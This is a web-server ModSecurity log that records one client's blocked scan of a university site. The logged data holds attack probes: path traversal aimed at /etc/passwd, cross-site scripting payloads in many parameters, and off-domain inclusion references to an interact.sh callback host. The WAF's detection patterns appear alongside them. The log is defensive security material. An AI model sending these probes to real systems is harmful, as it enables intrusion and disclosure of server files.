[Tue Aug 29 11:52:46.717088 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/openwin.php"] [unique_id "ZO15nsCo-f0AAAnjjUgAAAAX"]
[Tue Aug 29 11:52:46.879591 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:redirect_to: /asdf\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/demo/api/logout"] [unique_id "ZO15nsCo-f0AAAoLfKsAAAAG"]
[Tue Aug 29 11:52:47.618979 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/user/login/"] [unique_id "ZO15n8Co-f0AAAoO54AAAAAK"]
[Tue Aug 29 11:52:47.731340 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../..//../../ found within ARGS:dir: ../../..//../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15n8Co-f0AAAoXJqwAAAAP"]
[Tue Aug 29 11:52:48.775446 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/user/logout"] [unique_id "ZO15oMCo-f0AAAnjjVUAAAAX"]
[Tue Aug 29 11:52:49.545363 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:f. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:f: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/learn/cubemail/filemanagement.php"] [unique_id "ZO15ocCo-f0AAAnHQowAAAAT"]
[Tue Aug 29 11:52:49.556707 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/user/register"] [unique_id "ZO15ocCo-f0AAAfWOSAAAAAL"]
[Tue Aug 29 11:52:49.643499 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:m. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:m: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/anti-plagiarism/js.php"] [unique_id "ZO15ocCo-f0AAAmQ-3kAAAAb"]
[Tue Aug 29 11:52:49.643600 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:u. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:u: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/tweb/ft.php"] [unique_id "ZO15ocCo-f0AAAnTlVwAAAAA"]
[Tue Aug 29 11:52:50.728269 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/user/resend-activation"] [unique_id "ZO15osCo-f0AAAoT7RMAAAAD"]
[Tue Aug 29 11:52:52.070886 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1'<script found within ARGS:id: 1'<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO15pMCo-f0AAAnTlWYAAAAA"]
[Tue Aug 29 11:52:52.631065 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:loginMode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:loginMode: alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "mbkm.unla.ac.id"] [uri "/MicroStrategyLibrary/auth/ui/loginPage"] [unique_id "ZO15pMCo-f0AAAnHQpwAAAAT"]
[Tue Aug 29 11:52:52.821422 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://? found within ARGS:redirect_to: http://?1</sCripT><sCripT>alert(document.domain)</sCripT>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO15pMCo-f0AAAnd3OcAAAAI"]
[Tue Aug 29 11:52:52.868823 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >\\x22>< found within ARGS:mes: </script>\\x22><script>alert(123)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php"] [unique_id "ZO15pMCo-f0AAAoLfNEAAAAG"]
[Tue Aug 29 11:52:55.818712 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:")',10000000);alert(1337);setTimeout('alert(". [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22)',10000000);alert(1337);setTimeout('alert(\\x22: \\x22)',10000000);alert(1337);setTimeout('alert(\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/www/delivery/afr.php"] [unique_id "ZO15p8Co-f0AAAoW7LEAAAAJ"]
[Tue Aug 29 11:52:55.818970 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15p8Co-f0AAAoZ6QEAAAAK"]
[Tue Aug 29 11:52:55.890434 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:rsd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:rsd: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO15p8Co-f0AAAlUlyMAAAA0"]
[Tue Aug 29 11:52:58.537065 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:data[performredirect]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:data[performredirect]: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO15qsCo-f0AAAoesJoAAAAV"]
[Tue Aug 29 11:52:59.203589 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:file: '>\\x22<svg/onload=confirm('test')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/wordfence/lib/diffResult.php"] [unique_id "ZO15q8Co-f0AAAoPubYAAAAM"]
[Tue Aug 29 11:53:00.710960 2023] [:error] [pid 2581] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:passformname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:passformname: \\x22><script>alert(1514407383);</script><script>/*"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/plugins/vkeyboard/vkeyboard.php"] [unique_id "ZO15rMCo-f0AAAoVqsIAAAAH"]
[Tue Aug 29 11:53:00.739741 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22()&%< found within ARGS:language: language'\\x22()&%<yes></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/clansphere/mods/clansphere/lang_modvalidate.php"] [unique_id "ZO15rMCo-f0AAAoAkvoAAAAC"]
[Tue Aug 29 11:53:01.564190 2023] [:error] [pid 2595] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:pagination_wp_facethumb. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:pagination_wp_facethumb: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO15rcCo-f0AAAojancAAAAb"]
[Tue Aug 29 11:53:01.572346 2023] [:error] [pid 2604] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/awstats/awredir.pl"] [unique_id "ZO15rcCo-f0AAAosCuYAAAAm"]
[Tue Aug 29 11:53:02.671870 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/cgi-bin/awstats/awredir.pl"] [unique_id "ZO15rsCo-f0AAAfWOT8AAAAL"]
[Tue Aug 29 11:53:02.951039 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:is2sim. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:is2sim: \\x22zlo onerror=alert(1) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/php/device_graph_page.php"] [unique_id "ZO15rsCo-f0AAAog@BoAAAAY"]
[Tue Aug 29 11:53:04.007786 2023] [:error] [pid 2600] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/wp-json/anycomment/v1/auth/wordpress"] [unique_id "ZO15sMCo-f0AAAoocvkAAAAh"]
[Tue Aug 29 11:53:04.759533 2023] [:error] [pid 2598] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 0<script found within ARGS:version: 7.5.0<script>confirm(2Ue0IIxPe0GnIO9Ehzy5hFS4kkT)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/rewe/prod/web/rewe_go_check.php"] [unique_id "ZO15sMCo-f0AAAoml0sAAAAf"]
[Tue Aug 29 11:53:05.067364 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh?a=https://interact.sh found within TX:1: interact.sh?a=https://interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/wp-json/anycomment/v1/auth/wordpress"] [unique_id "ZO15scCo-f0AAAot8LsAAAAn"]
[Tue Aug 29 11:53:06.430374 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15ssCo-f0AAAofm4kAAAAX"]
